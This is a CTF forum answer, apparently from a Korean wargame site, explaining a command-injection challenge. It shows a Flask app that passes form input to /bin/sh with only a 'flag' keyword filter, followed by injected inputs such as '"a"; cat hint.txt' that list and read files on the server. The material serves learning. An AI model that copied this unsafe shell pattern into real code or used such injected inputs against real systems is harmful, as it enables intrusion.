어떻게풀어야하나요
자세히 처음부터 설명해주세요 ㅜㅜ
#misc
Author
Answers
1
ɢ3ɴ3s1$
No badge
This challenge is related to Command Injection
@APP.route('/', methods=['GET', 'POST'])
def index():
if request.method == 'POST':
user_input = request.form.get('user_input')
cmd = f'echo $({user_input})'
if 'flag' in cmd:
return render_template('index.html', result='No!')
try:
output = subprocess.check_output(['/bin/sh', '-c', cmd], timeout=5)
return render_template('index.html', result=output.decode('utf-8'))
except subprocess.TimeoutExpired:
return render_template('index.html', result='Timeout')
except subprocess.CalledProcessError:
return render_template('index.html', result='Error')
return render_template('index.html')
As you can see when you enter any command then system will run it
Try to use command to find flag
- Enter
"a"; ls
: Result isapp.py dream hint.txt requirements.txt static templates
- Enter
"a"; cat hint.txt
: Result isWhere is Flag? ./dream/hack/hello
- Enter
"a"; ls ./dream/hack/hello
: Result isflag.txt
- However, if
flag
in your command, result isNo!
I think with this explanation you can do the rest to find the flag.
Good luck!